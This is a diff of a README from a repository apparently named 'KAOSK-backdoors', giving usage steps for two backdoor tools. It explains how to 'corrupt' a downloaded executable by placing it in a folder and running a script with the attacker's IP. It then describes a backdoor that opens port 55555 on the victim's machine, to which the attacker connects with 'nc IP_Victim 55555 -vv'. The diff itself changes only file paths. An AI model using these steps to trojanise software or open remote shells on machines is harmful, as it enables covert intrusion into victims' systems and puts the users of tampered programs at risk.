carlospolop/KAOSK-backdoors/README.md

 ## Backdoor-factory
 The backdoor-factory introduce the backdoor inside executables.

-If you want to corrupt a executable, you just have to download the original, move it to the correct folder inside BDF_prepared and run python ./create_backdoors.py <IP_attacker> (or python ./backdoor-factoryAuto.py <IP_attacker>)
+If you want to corrupt a executable, you just have to download the original, move it to the correct folder inside ./BDF_prepared and run python ./create_backdoors.py <IP_attacker> (or python ./backdoor-factoryAuto.py <IP_attacker>)

 https://github.com/secretsquirrel/the-backdoor-factory.git

 ## MiaoMiao
 This backdoor open a port in the victims machine and the attacker connects to it.
 The default port is 55555 To use this backdoor you have to run:
-+ Victim: Run src_backdoor > server_dist > newest_version
++ Victim: Run MiaoMiamo_folder/src_backdoor/server_dist/newest_version
 + Attacker: nc IP_Victim 55555 -vv

 https://github.com/marc0l92/MiaoMiao_project.git